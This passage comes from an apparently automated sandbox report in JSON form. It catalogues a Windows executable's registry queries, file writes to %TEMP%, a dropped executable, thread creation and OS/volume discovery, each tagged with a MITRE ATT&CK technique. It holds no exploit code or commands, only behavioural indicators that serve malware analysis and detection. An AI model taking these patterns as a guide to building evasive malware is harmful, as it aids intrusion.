(Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\version.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"F1966F0E7D7A119ACCA8EC8C835C5BC82EF9F77D216C16F23FA2D36FD7C32303\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00002876)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" queries volume information of \"C:\\\" at 00000000-00002904-0000010C-1374539\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002876-0000010C-293792\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002996-0000010C-786649", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" queries volume information of \"C:\\\" at 00000000-00002904-0000010C-1374539\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002876-0000010C-293792\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002996-0000010C-786649", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e0018682e0013682e00000000000000000000002b00000000019cdd22000000000000eb220095e10e7713a11500feffffff435c127750591277aa000000b800000012682e0010682e0024df22005ce322000000000000000000000000000000000000000000000000008009000000002b001c5c117760d81175ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed12773a682e00a06ae8748600000024df22005ce322000000000086008800a06ae87424df2200916ce8743a682e00a06ae874a06ae87494e3220002020000 (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002904)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b00c0982b00bb982b00000000000000000000002800000000019cdc22000000000000ea220095e10e7734aa1500feffffff435c127750591277aa000000b8000000ba982b00b8982b0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c117760d81175ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed1277e2982b00a06ae8748600000024de22005ce222000000000086008800a06ae87424de2200916ce874e2982b00a06ae874a06ae87494e2220002020000 (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002876)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf001377d6001377a84d257770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00002876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00002904)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00002904)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: 